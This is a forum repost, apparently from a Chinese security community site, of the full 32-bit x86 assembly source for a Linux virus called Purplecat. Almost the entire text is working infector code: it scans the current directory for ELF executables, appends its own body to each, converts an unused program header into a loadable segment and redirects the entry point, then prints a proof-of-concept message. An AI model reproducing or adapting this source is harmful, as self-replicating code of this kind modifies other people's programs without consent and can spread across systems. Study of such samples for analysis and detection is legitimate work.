Virus.Linux.Purplecat Souce Code
信息来源:邪恶八进制信息安全团队(
www.eviloctal.com)
BITS 32
GLOBAL main
SECTION .text
system EQU 0x80
standart_output EQU 1
read_and_write EQU 2
SEEK_SET EQU 0
SEEK_CUR EQU 1
SEEK_END EQU 2
new_line EQU 10
sys_exit EQU 1
sys_read EQU 3
sys_write EQU 4
sys_open EQU 5
sys_close EQU 6
sys_lseek EQU 19
sys_readdir EQU 89
sys_getcwd EQU 183
main:
pushad
pushfd
call Virus
popfd
popad
jmp Host
Virus:
Start:
pop eax
push eax
push ebp
mov ebp, esp
sub esp, 512
mov dword [ebp - 4], eax ;We have in [ebp - 4] the virtual address (delta offset) of the virus.
mov ecx, 256
lea ebx, [ebp - 256]
mov eax, sys_getcwd
int system
xor edx, edx
xor ecx, ecx
lea ebx, [ebp - 256]
mov eax, sys_open
int system
test eax, eax
js Exit
mov dword [ebp - 8], eax ;We have in [ebp - 8] the handle of current path.
jmp Find_file
Exit:
jmp Payload
Close_file:
mov ebx, [ebp - 12]
mov eax, sys_close
int system
Find_file:
lea ecx, [ebp - 274]
mov ebx, [ebp - 8]
mov eax, sys_readdir
int system
test eax, eax
jz Exit
mov ecx, read_and_write
lea ebx, [ebp - 264]
mov eax, sys_open
int system
test eax, eax
js Find_file
mov [ebp - 12], eax ;We have in [ebp - 12] the handle of the file we are going to check.
mov edx, 52
lea ecx, [ebp - 64]
mov ebx, [ebp - 12]
mov eax, sys_read
int system
test eax, eax
js Close_file
mov eax, [ebp - 64]
cmp eax, 0x464C457F
jnz Close_file
mov eax, [ebp - 60]
cmp eax, 0x00010101
jnz Close_file
mov ax, [ebp - 48]
cmp ax, 0x0002
jnz Close_file
mov eax, [ebp - 46]
cmp eax, 0x00010003
jnz Close_file
Infect_file:
mov cx, [ebp - 20]
test cx, cx
jz Close_file
mov eax, [ebp - 40]
mov [ebp - 16], eax ;We have in [ebp - 16] the entry point of the program.
and ecx, 0x0000FFFF
mov ebx, [ebp - 36]
mov [ebp - 20], ebx ;We have in [ebp - 20] the offset of the first program header.
Check_ph:
push ecx
mov edx, SEEK_SET
mov ecx, [ebp - 20]
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system
mov edx, 32
lea ecx, [ebp - 52]
mov ebx, [ebp - 12]
mov eax, sys_read
int system
mov eax, [ebp - 52]
test eax, eax
jz Unused_ph
cmp dword eax, 6
jz Unused_ph
add dword [ebp - 20], 32
pop ecx
loop Check_ph
jmp Close_file
Unused_ph:
mov edx, SEEK_END
mov ecx, 0
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system
mov [ebp - 24], eax ;We have in [ebp - 24] the size of the file.
mov edx, End_virus - main
mov ecx, [ebp - 4]
sub ecx, 7
mov ebx, [ebp - 12]
mov eax, sys_write
int system
mov edx, SEEK_SET
mov ecx, [ebp - 24]
add ecx, 10
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system
mov eax, [ebp - 16]
sub eax, 0x2000000E
sub eax, [ebp - 24]
mov [ebp - 28], eax
mov edx, 4
lea ecx, [ebp - 28]
mov ebx, [ebp - 12]
mov eax, sys_write
int system
mov edx, SEEK_SET
mov ecx, [ebp - 20]
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system
mov eax, [ebp - 24]
add eax, End_virus - main
mov dword [ebp - 56], 0x00000001
mov dword [ebp - 52], 0x00000000
mov dword [ebp - 48], 0x20000000
mov dword [ebp - 44], 0x20000000
mov dword [ebp - 40], eax
mov dword [ebp - 36], eax
mov dword [ebp - 32], 0x00000007
mov dword [ebp - 28], 0x00001000
mov edx, 32
lea ecx, [ebp - 56]
mov ebx, [ebp - 12]
mov eax, sys_write
int system
mov edx, SEEK_SET
mov ecx, 24
mov ebx, [ebp - 12]
mov eax, sys_lseek
int system
mov eax, [ebp - 24]
add eax, 0x20000000
mov dword [ebp - 28], eax
mov edx, 4
lea ecx, [ebp - 28]
mov ebx, [ebp - 12]
mov eax, sys_write
int system
jmp Close_file
Payload:
mov dword [ebp - 76], 'Hi, '
mov dword [ebp - 72], 'this'
mov dword [ebp - 68], ' is '
mov dword [ebp - 64], 'a pr'
mov dword [ebp - 60], 'oof '
mov dword [ebp - 56], 'of c'
mov dword [ebp - 52], 'once'
mov dword [ebp - 48], 'pt v'
mov dword [ebp - 44], 'irus'
mov dword [ebp - 40], ', by'
mov dword [ebp - 36], ' Pur'
mov dword [ebp - 32], 'ple '
mov dword [ebp - 28], 'Cat:'
mov dword [ebp - 24], ' pur'
mov dword [ebp - 20], 'ple-'
mov dword [ebp - 16], 'cat@'
mov dword [ebp - 12], 'hotm'
mov dword [ebp - 8], 'ail.'
mov dword [ebp - 4], 'es' + new_line*256*256
mov edx, 75
lea ecx, [ebp - 76]
mov ebx, standart_output
mov eax, sys_write
int system
leave
ret
End_virus:
Host:
mov edx, 21
mov ecx, Host_message
mov ebx, standart_output
mov eax, sys_write
int system
mov eax, sys_exit
int system
SECTION .data
Host_message db "The host is running!", new_line
[
本帖最后由 delphiscn 于 2008-6-7 22:37 编辑 ]
